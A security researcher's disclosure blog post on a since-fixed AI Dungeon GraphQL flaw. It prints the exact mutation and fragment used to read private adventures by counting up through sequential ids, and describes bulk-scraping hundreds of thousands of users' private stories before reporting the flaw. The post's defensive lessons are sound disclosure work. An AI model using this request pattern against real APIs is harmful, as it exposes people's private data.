Wednesday, April 28, 2021

Leak in AI Dungeon made all stories publicly accessible up until April 18th

AI Dungeon Public Disclosure Vulnerability Report - GraphQL Unpublished Adventure Data Leak

Notice: Following responsible disclosure procedures, the issues here have been brought up to the developers and have been fixed before this report was published. Similarly, all private data collected has been deleted.

Overview

424k raw requests

On April 18th, I discovered a vulnerability in the AI Dungeon GraphQL API that allowed unpublished adventures, unpublished scenarios, and unpublished posts to be leaked. These resources could be read in bulk, at a rate of approximately 1000 requests per minute. Unfortunately, this is, in fact, the second time I have discovered this exact vulnerability. The first time, the issue was reported and fixed, but after finding it again, I can see that simply reporting the issue was a mistake.

Rather, I am using this report as leverage. By making not only the devs, but the users aware of these critical issues, it will hopefully incentivize the AI Dungeon team to ensure that vulnerabilities like these never see the light of day. By leading by example with this report, I hope that others in the community will have something to emulate going forward, and that this sort of collaboration with the community will result in a much more secure product for all. I truly believe this to be the case because, thanks to this report, things are already changing for the better! (See "Security Improvements Resulting From This Report" below.)

Nevertheless, the issue still stands that the vulnerability did, in fact, exist. It is difficult to grasp the magnitude of a vulnerability like this, as well as its severity, from words alone. To help make this more tractable, I have compiled and published some heavily aggregated, anonymized adventure data.

The Data

Adventures, and the actions they contain, are the lifeblood of AI Dungeon, so in the limited amount of time I was in possession of various data, I spent it analyzing adventures in bulk. The adventures gathered constitute all adventures created between the start of April 15th, 2021 and the start of April 19th, 2021. There was nothing preventing me from collecting more data, but what was gathered seemed sufficient to demonstrate the vulnerability fully - adventures dating all the way back to Dec 16th, 2019 were at risk. Unpublished scenarios, posts, and comments were also gathered but ended up being unused.

The vulnerability was discovered on April 18th, the data was collected over the span of a few hours on April 18th crossing into the 19th, and the vulnerability was announced to the devs on the 19th.

Now, what about the adventure data was analyzed? Actions. And, more specifically, non-multiplayer, non-AI-generated, non-scenario actions. That is, anonymized user inputs. While the AI responses are interesting, they are relatively less so from a security point of view. The initial scenario prompt was discarded as well, to prevent popular scenarios from skewing the data. Finally, cloned adventures were also discarded, as were any excess adventures for users past the fifth one.

All this trimming cut the analysis down from 343k adventures and 12M actions to 188k adventures and 3.9M user actions. So what was compiled with all these user actions? Let's take a look.

An Example

Aggregated adventure data

The data is fairly simple. The first column is a sentence fragment with case and punctuation removed. The second column is a count of how many unique adventures contained that exact fragment in a user input. If a sentence fragment appeared in fewer than 10 unique adventures, it was discarded from the result set to preserve anonymity.

In this example, players typed "you summon a" in 1198 different adventures, which constituted 0.6% of all adventures analyzed. Similarly, players typed "you summon a demon" in 129 different adventures. There is absolutely no massaging of this data - so the counts for "you summon" and "you summoned" are completely different. This does not imply that the entire user input was "you summon a". It might have been "You clasp your hands together and you summon a bolt of lightning."
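As a rough sketch of the counting described above (not the script actually used for this report; the function names and the cap on fragment length are assumptions made for illustration), each user action is lowercased, stripped of punctuation, and split into word fragments, and each fragment is counted at most once per adventure:

```python
import re
from collections import Counter

MIN_ADVENTURES = 10  # fragments seen in fewer adventures are dropped (from the report)
MAX_WORDS = 4        # assumed cap on fragment length, purely illustrative


def normalize(text):
    """Lowercase the text, drop punctuation, and split it into words."""
    return re.sub(r"[^a-z0-9\s]+", "", text.lower()).split()


def fragments(words, max_words=MAX_WORDS):
    """Yield every contiguous run of 1..max_words words as a single string."""
    for size in range(1, max_words + 1):
        for start in range(len(words) - size + 1):
            yield " ".join(words[start:start + size])


def count_fragments(adventures, min_adventures=MIN_ADVENTURES):
    """adventures: iterable of lists of user-action strings, one list per adventure."""
    counts = Counter()
    for actions in adventures:
        seen = set()
        for action in actions:
            seen.update(fragments(normalize(action)))
        counts.update(seen)  # one increment per adventure, not per occurrence
    return {frag: n for frag, n in counts.items() if n >= min_adventures}
```

Because a fragment is added to a per-adventure set before counting, typing "you summon a" five times in one adventure still only contributes 1 to its total.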

I haven't done an exhaustive exploration of the data by any means, other than spot checking it to ensure that it was correct before deleting the underlying data it was based off of.

Also note that, due to not having a terabyte of RAM, this data needed to be processed in batches of around 10,000 adventures each. In each batch, fragments appearing only once were purged. Therefore, counts under around 25 are actually underestimates.
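To see why purging per batch turns small counts into underestimates, here is a toy sketch (tiny batch size and made-up fragments, not the real pipeline): a fragment that shows up only once in each of several batches is purged every time, so those adventures never reach the total.

```python
from collections import Counter


def batched_counts(adventure_fragment_sets, batch_size):
    """Count fragments per batch, dropping fragments seen only once in a batch."""
    total = Counter()
    for start in range(0, len(adventure_fragment_sets), batch_size):
        batch = Counter()
        for frags in adventure_fragment_sets[start:start + batch_size]:
            batch.update(set(frags))
        # Purge singletons before merging, to keep memory bounded.
        total.update({f: n for f, n in batch.items() if n > 1})
    return total


# Hypothetical data: "rare" occurs in 3 adventures, but never twice in one batch.
data = [{"common", "rare"}, {"common"}, {"common", "rare"},
        {"common"}, {"common", "rare"}, {"common"}]
exact = batched_counts(data, batch_size=len(data))
batched = batched_counts(data, batch_size=2)
print(exact["rare"], batched["rare"])      # 3 0
print(exact["common"], batched["common"])  # 6 6
```

Frequent fragments are unaffected, since they appear more than once in every batch; only the rare tail loses counts.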

A Surprising Observation 😳

Looking at the resulting aggregated data led to a very surprising observation. There were A LOT of lewd or otherwise NSFW user action fragments - way more than I had anticipated. As a bit of follow-up analysis, I checked what percentage of adventures had explicitly lewd (18+) actions, and what percentage had NSFW actions.

The results are... surprising, to say the least. Out of the 188k adventures (and 3.9M user actions) analyzed:

87.3k (46.3% of all adventures sampled) are NSFW and...

59.1k (31.4%!!! of all adventures sampled) are explicit (18+)

Those, to me, are some insane numbers. Not only because of the sheer volume of the active player base that has chosen to interact with a state-of-the-art OpenAI language model by lewding it, but also because of just how sensitive that makes the data. To reiterate, no, I will not be releasing any individual adventures in any capacity - they were deleted the second the statistics were gathered. However, this is very important data, both for the community and the AI Dungeon team. From these results, it's clear that a bad actor getting access to this data may as well be hacking something akin to an adult website, and could exploit all the fear, paranoia, and blackmail potential that comes with that. Hopefully that never happens, but you can see why security is even more important than you might have initially thought.

The percentages result from the following procedure: if a user action contains a word that is only ever used in a lewd context, the adventure is marked both explicit and NSFW. Words that can go either way, but are still NSFW, mark the adventure as NSFW only. The percentages presented here are therefore lower bounds, as I didn't check against an exhaustive list of words.
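The procedure can be sketched as follows. The word lists here are placeholders (the lists actually used are not published in this report), and the function name is hypothetical:

```python
import re

# Placeholder word lists; the real lists are not part of this report.
EXPLICIT_ONLY = {"explicitword"}     # words only ever used in a lewd context
NSFW_AMBIGUOUS = {"suggestiveword"}  # NSFW words that are not necessarily explicit


def classify(actions):
    """Return (is_nsfw, is_explicit) for one adventure's list of user actions."""
    words = set()
    for action in actions:
        words.update(re.findall(r"[a-z']+", action.lower()))
    is_explicit = bool(words & EXPLICIT_ONLY)
    # Explicit implies NSFW; ambiguous words mark the adventure NSFW only.
    is_nsfw = is_explicit or bool(words & NSFW_AMBIGUOUS)
    return is_nsfw, is_explicit
```

An adventure that uses NSFW words missing from both lists is classified as clean, which is why a non-exhaustive list can only undercount.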

A Brief Tangent on Privacy

The above statistics make the recently implemented AI Dungeon content filter (made live on April 27th), and the following developer statement (made April 28th), downright shocking: Flagged Input

In summary - if user input on a private adventure is flagged using an automated system, it will be manually reviewed, with other private user adventures potentially being manually reviewed as well. With almost half of the userbase being involved with NSFW stories, this seems like a tremendous misstep, as users have an expectation that their private adventures are, well, private. Users went from being able to freely enjoy the AI, to now having to make a mental check of whether or not their input is appropriate. This seems like a violation of user expectations, and the resulting moderation a breach of privacy and trust. It is perhaps incredibly ironic coming from a report about a data breach, but I feel like I, as a third party, have put in more respect for user data than the developers have. This just seems backwards, and, although it might not mean much, I strongly urge the AI Dungeon team to reconsider their policies going forward.

Downloading the Data

Now that you know the data contains quite a bit of lewdness, you should not download it if you are sensitive to such topics. It also contains racial slurs, and other unpleasantness. However, the data is aggregated, anonymized, and for the most part, fairly clinical, so I recommend taking a look if you don't find those to be an issue. Through it, I have discovered the data is more sensitive than expected, but I hope that others in the community can make other discoveries as well!

Get the aggregated, anonymized adventure data here - JSON

Get the aggregated, anonymized adventure data here - CSV

Example scripts for using the json data

Security Discussion

There are a number of compounding factors that made this vulnerability much worse than it otherwise might have been. Some of these have already been fixed after being brought up to the devs (great work!), but I will still go over them, as I think they're important lessons to keep in mind for anyone wanting to practice good GraphQL API security, or API security in general.

In my opinion, the biggest four factors at the time of the vulnerability were:

  1. Using autoincrementing ids (if adventure #20 exists, adventure #21 is likely to exist, as are #22-#30 etc.)
  2. Not having reasonable rate limits in place
  3. Not having anomaly detection alerts
  4. Keeping introspection enabled in production

Now, let's go over what each one means.

Autoincrementing Ids

Autoincrementing ids are, in my opinion, by far the biggest issue. They allow someone to read all resources simply by starting from 1 and counting upwards. Had these not been used, a secondary vulnerability would have needed to be discovered alongside the vote vulnerability in order to exploit either one; otherwise, there would be no way to figure out what the private adventure ids are, even if they could be read through a vulnerability. I recommend deprecating and removing autoincrementing ids completely, as soon as possible. After that point, leaking or publishing a non-UUID id should be treated as a security issue in itself.

Also note - autoincrementing ids allow anyone to trivially figure out roughly how many of each resource exists. For AI Dungeon, (as of April 19th) these would be:

  • ~1B actions
  • ~50M adventures
  • ~800K scenarios
  • ~250K comments - 10% on posts, 25% as nested comments, 50% on scenarios, 5% on adventures, 10% on "story" posts
  • ~20K posts
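As a small illustration of the difference (a sketch using Python's standard uuid module; the helper names are made up), one known sequential id reveals its neighbours, while a random UUID reveals nothing about any other id:

```python
import uuid


def next_sequential_ids(known_id, count):
    """With autoincrementing ids, one known id reveals its likely neighbours."""
    return [known_id + offset for offset in range(1, count + 1)]


def new_public_id():
    """A version-4 UUID is random, so other valid ids cannot be derived from it."""
    return str(uuid.uuid4())


print(next_sequential_ids(20, 3))  # [21, 22, 23]
print(new_public_id())             # different on every run
```

Random ids only remove the ability to enumerate. They do not replace an authorization check on the resource itself.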

No Reasonable Rate Limits

Reasonable rate limits would only have been a mitigation, but they could still have helped quite a bit by making it much harder to read thousands of resources. It is not normal user behavior to upvote 1000 adventures a minute. Capping upvote mutations at, say, 5 requests per second, 50 per minute, and 500 per hour would have slowed down the data gathering tremendously.
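A minimal sketch of such a limiter, assuming one instance per user and an in-memory sliding window (the class name is hypothetical, and a real deployment would more likely keep this state in a shared store):

```python
import time
from collections import deque

# (window in seconds, max requests), taken from the figures suggested above.
LIMITS = [(1, 5), (60, 50), (3600, 500)]


class VoteRateLimiter:
    """Sliding-window limiter for a single user; a sketch, not production code."""

    def __init__(self, limits=LIMITS, clock=time.monotonic):
        self.limits = limits
        self.clock = clock
        self.timestamps = deque()  # times of accepted requests, oldest first

    def allow(self):
        now = self.clock()
        longest = max(window for window, _ in self.limits)
        # Forget requests older than the longest window.
        while self.timestamps and now - self.timestamps[0] >= longest:
            self.timestamps.popleft()
        for window, max_requests in self.limits:
            recent = sum(1 for t in self.timestamps if now - t < window)
            if recent >= max_requests:
                return False
        self.timestamps.append(now)
        return True
```

At 500 requests per hour, the roughly 424k raw requests mentioned in the overview would have taken about 848 hours (around 35 days) from a single account, rather than a few hours.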

No Anomaly Detection / Alerting

Of course, these sorts of limits can be overcome - especially with a free product like AI Dungeon. Hundreds of machines could be rented to turn those 500 requests max per hour into tens of thousands. These sorts of attacks require much more sophistication and coordination to pull off, however, making them much less likely. Not impossible, though, which means that these should be mitigated as well. In my opinion, the best way to deal with something like that is through high-threshold anomaly alerting. If the vote endpoint is suddenly getting hammered with 100x its normal traffic, a high-priority alert - not a warning - should be issued, and a developer should be paged.
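The alerting rule itself can be very simple. Here is a sketch, assuming per-minute request counts are already being collected somewhere; the function names, the median baseline, and the sample traffic figures are all assumptions for illustration:

```python
from statistics import median


def baseline(history):
    """Typical requests per minute, taken as the median of recent minutes."""
    return median(history) if history else 0.0


def should_page(current_per_minute, baseline_per_minute, factor=100, floor=1.0):
    """True when traffic reaches `factor` times the baseline.

    `floor` stops a near-zero baseline from paging on a handful of requests.
    """
    return current_per_minute >= factor * max(baseline_per_minute, floor)


recent_minutes = [8, 10, 12, 9, 11]  # made-up vote traffic, requests per minute
print(should_page(1000, baseline(recent_minutes)))  # True
print(should_page(500, baseline(recent_minutes)))   # False
```

Unlike per-user rate limits, this check looks at the endpoint as a whole, so it still fires when the load is spread across many accounts or machines.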

Introspection Enabled in Production

Finally, introspection should be turned off in production for GraphQL. The AI Dungeon API is a fast-changing, unpublished API. There is no reason to allow users to be able to query all queries, mutations, subscriptions, objects, and enums in one query to __schema.

Again, this can be somewhat circumvented. The endpoints a client uses would, of course, be present in the client code, and users can simply look at requests being made in their browser. However, private, deprecated, and otherwise hidden functionality would not be exposed through this method. Security through obscurity should not be relied upon, but disabling introspection raises the barrier to entry for more advanced attacks.

Speaking of introspection, the following was the exact query made to the AI Dungeon GraphQL API to get the list of endpoints and resources back:

GraphQL introspection query

The response was parsed using some hacky JavaScript, but I dare say the results are presentable. As you can see, the script resolves required variables, arguments, default values, and objects.

Hacky javascript to parse introspection results

Object Mutation
  Achievement achieve(achievementId:String)
  ActionError addAction(input:ActionInput)
  Adventure addAdventure(scenarioId:String, prompt:String, memory:String)
  Adventure addCharacter(input:CharacterInput)
  Boolean addDeviceToken(token:String, platform:String)
  // 100 or so mutations not shown
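Signature lines like the ones above can be produced from a standard introspection response with very little code. The following is a Python sketch of the idea, not the JavaScript actually used; the function names are made up, and the sample field is hand-written in the shape an introspection response uses (kind, name, ofType):

```python
def type_name(type_ref):
    """Render an introspection type reference, e.g. [Action] for a list of Action."""
    kind = type_ref["kind"]
    if kind == "NON_NULL":  # drop the non-null wrapper for brevity
        return type_name(type_ref["ofType"])
    if kind == "LIST":
        return "[" + type_name(type_ref["ofType"]) + "]"
    return type_ref["name"]


def field_signature(field):
    """Render one field as 'ReturnType name(arg:Type, ...)'."""
    args = ", ".join(
        f"{a['name']}:{type_name(a['type'])}" for a in field.get("args", [])
    )
    head = f"{type_name(field['type'])} {field['name']}"
    return f"{head}({args})" if args else head


# Hand-written sample in the shape of a standard introspection response.
sample_field = {
    "name": "voteContent",
    "args": [{
        "name": "input",
        "type": {"kind": "INPUT_OBJECT", "name": "ContentResponseInput", "ofType": None},
    }],
    "type": {"kind": "INTERFACE", "name": "Votable", "ofType": None},
}
print(field_signature(sample_field))  # Votable voteContent(input:ContentResponseInput)
```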

Breakdown of the Actual Vulnerability

The following goes into the technical details of the vulnerability itself. At a high level, the upvote API endpoint takes in an id and a resource type. The vulnerability consists of calling the upvote endpoint with ids identifying private resources, and getting full private resources back through a quirk of how GraphQL functions.

Here is the endpoint being called (all code snippets here were generated from parsing the introspection results - hence why you should disable introspection in production...!):

Votable voteContent(input:ContentResponseInput)

As you can see, the return type of voteContent is Votable. Here is its definition:

Interface Votable implemented by Adventure, Comment, Post, Scenario {
  id: ID
  publicId: String
  totalUpvotes: Int
  userVote: String
}

At this point, you might already be seeing how this comes together. The voteContent mutation returns a Votable, which is an interface implemented by Adventures, Comments, Posts, and Scenarios. And, depending on the ContentResponseInput, that's exactly what you get back - one of those four resource types.

Now, let's take a look at the ContentResponseInput object:

Input_object ContentResponseInput {
  contentId: String
  contentType: String
  data: JSONObject
  id: String
  responseType: String
  responseValue: String
}

ContentResponseInput is entirely generic, which is great for code reuse, but makes it so that all the resource types are affected by the same vulnerability!

So, how exactly is this endpoint a vulnerability?

Well, consider the following ContentResponseInput:

{
 "variables": {
  "input": {
   "contentId": "1",
   "contentType": "adventure",
   "responseType": "vote",
   "responseValue": "novote"
  }
 },
 "query": "mutation ($input:ContentResponseInput) { voteContent(input:$input) { __typename } }"
}

The mutation above actually returned a response from the AI Dungeon API, which is why I say that all adventures were at risk, from adventure id #1 all the way to adventure id #72500000. Still - you might be asking - if the response type is a Votable, how are adventures being leaked? The answer is that Votable is actually an interface. A real concrete object type is powering the response. And, in this case, it would be an Adventure, as printed by __typename. This means that any fields of an Adventure (aka: all of them!) could be queried for in the response.

Normally, however, GraphQL disallows this - only Votable interface fields can be queried for. So how were adventure fields fetched? GraphQL has the concept of fragments.

Take a look at the following:

Object Adventure {
  actions: [Action]
  id: ID
  user: User
  title: String
  // other fields omitted for clarity
}

Calling ... voteContent(input:$input) { actions } returns an error - actions is not a field of the Votable interface. However, by defining the following:

fragment MyVulnerability on Adventure { actions { text } id user { username } title }

...and including it:

mutation($input:ContentResponseInput) { voteContent(input:$input) { ...MyVulnerability } }

voteContent will return all fields in the fragment. This is perhaps a strange quirk of GraphQL, but nevertheless is a feature, and very important to take note of. I don't know if this functionality has an exact name, but I propose calling this 'downcasting', as you're essentially performing an explicit downcast on an interface into a more specific type, at which point you're able to query the downcasted fields.
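For what it's worth, the GraphQL specification refers to the `on Adventure` part of a fragment as a type condition. The validation behavior described above can be modelled with a toy sketch. This is a heavy simplification of the spec's rules, using only the schema excerpt shown in this report, and the function name is hypothetical:

```python
# Field names taken from the schema excerpts in this report; only Adventure is modelled.
TYPE_FIELDS = {
    "Votable": {"id", "publicId", "totalUpvotes", "userVote"},
    "Adventure": {"id", "publicId", "totalUpvotes", "userVote",
                  "actions", "user", "title"},
}
POSSIBLE_TYPES = {"Votable": {"Adventure", "Comment", "Post", "Scenario"}}


def validate_selection(parent_type, field, type_condition=None):
    """Return True if `field` may be selected on `parent_type`.

    With a type condition, the field is checked against the narrower type,
    provided that type is one the parent could actually be at runtime.
    """
    if type_condition is None:
        return field in TYPE_FIELDS[parent_type]
    if type_condition not in POSSIBLE_TYPES.get(parent_type, {parent_type}):
        return False
    return field in TYPE_FIELDS.get(type_condition, set())


print(validate_selection("Votable", "actions"))               # False
print(validate_selection("Votable", "actions", "Adventure"))  # True
```

The takeaway is that an interface return type does not limit what a client can read. Every field of every implementing type is reachable, so access has to be enforced on the object itself.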

Ironically, however, even if this quirk didn't exist, I would still consider the voteContent endpoint a security vulnerability. It allows a user to associate a public uuid with an autoincrementing id, and is callable on unpublished resources, which greatly increases the attack surface for those resources.

Now you know why voting is disabled on the site!

Upvoting is disabled
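One way to close this class of hole, regardless of which fields a client selects, is to check visibility before a resolver returns the object at all. A minimal sketch, assuming hypothetical `owner_id` and `published` attributes and a hypothetical resolver signature (this report does not describe AI Dungeon's actual data model or the fix that was applied):

```python
from dataclasses import dataclass


@dataclass
class Resource:
    id: str
    owner_id: str
    published: bool


class NotAuthorized(Exception):
    pass


def can_view(viewer_id, resource):
    """Unpublished resources are visible only to their owner."""
    return resource.published or resource.owner_id == viewer_id


def vote_content(viewer_id, resource, vote):
    """Hypothetical resolver: authorize first, then act and return the object."""
    if not can_view(viewer_id, resource):
        raise NotAuthorized("resource not found")  # do not reveal that it exists
    # ... record the vote here ...
    return resource
```

With a check like this in every resolver that returns a Votable, Savable, or Commentable, a fragment on the concrete type can only ever expose resources the caller was already allowed to see.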

More Endpoints that Could Also Leak All Adventures

Interestingly, this vulnerability was actually present in multiple endpoints.

saveContent

// here's our good friend ContentResponseInput again
Savable saveContent(input:ContentResponseInput)

Interface Savable implemented by Adventure, Post, Scenario {
  id: ID
  isSaved: Boolean
  publicId: String
}

Saving of certain resources is currently disabled because of this vulnerability.

saveContent is disabled

createContentResponse

// A different vulnerability, still using ContentResponseInput
ContentResponse createContentResponse(input:ContentResponseInput)

Object ContentResponse{
  commentText: String
  contentId: String
  contentType: String
  createdAt: DateTime
  data: JSONObject
  id: ID
  responseType: String
  responseValue: String
  user: User
  userId: String
  username: String
}

This generic endpoint is also disabled. In this case, downcasting didn't need to be used - we simply got a resource response back wholesale.

Disabling this endpoint means that typing in feedback currently doesn't work on the site. This is somewhat unfortunate, because there doesn't seem to be any indication to the end user that their feedback didn't go through.

Feedback is disabled

Feedback is disabled error message

createComment

// Anything 'Commentable' is also disabled - you could create a comment on any resource, and get the full resource back
Commentable createComment(input:CommentInput)

Interface Commentable implemented by Adventure, Comment, Post, Scenario {
  allowComments: Boolean
  comments: [Comment]
  id: ID
  publicId: String
  title: String
  totalComments: Int
  userId: String
}

Input_object CommentInput{
  commentText: String
  contentType: String
  id: String
  publicId: String
}

Anything Commentable was vulnerable as well - hence createComment being disabled.

Commenting is disabled

Anything Searchable

Interface Searchable implemented by Adventure, Post, Scenario { ... }

Finally, Searchable has the exact same potential vulnerability going on. However, by its very nature the Searchable endpoints return, well, searchable data, so this is less of an issue.

[Searchable] deletedContent
[Searchable] search(input:SearchInput)
[Searchable] featured(isHoliday:Boolean)
[Searchable] revampedFeatured(isHoliday:Boolean)

Interestingly, for Searchable, downcasting can actually be used to good effect for the feature it was meant to support - getting more specific details out of a result set without having to make multiple secondary queries!

Nevertheless, as you can see, a tremendous number of endpoints all had the possibility of leaking every adventure, scenario, and post, and they've all been disabled because of it.

Conclusion

This is a serious vulnerability that was allowed to happen due to a number of compounding issues. As part of responsible disclosure, this issue, and a handful of others, have been brought up to the devs and have been fixed before this report was published. Hopefully, this report will serve as an inflection point for the AI Dungeon team, causing them to reprioritize their efforts on security-related issues.

Security Improvements Resulting From This Report

The team has already made some security changes per my recommendations, such as disabling introspection on their GraphQL API, and is planning to schedule additional security penetration testing sessions to discover bugs and vulnerabilities before they become a problem. More automated testing resulting from this report was mentioned as well, which I am very happy to see. More testing leads to higher quality software, allowing devs to refactor safely, encouraging them to think critically about edge cases, and motivating best practices such as code reuse.

The half dozen or so vulnerable endpoints have been disabled as well, of course.

About Me

I am a site reliability engineer with a couple of years of experience, and enjoy making things work. If you would like some consultation done, whether it's around GraphQL, security, infrastructure, scaling, or anything else, reach out. I'd love to work with you!

As something fun, I helped write the AI Dungeon Discord bot.
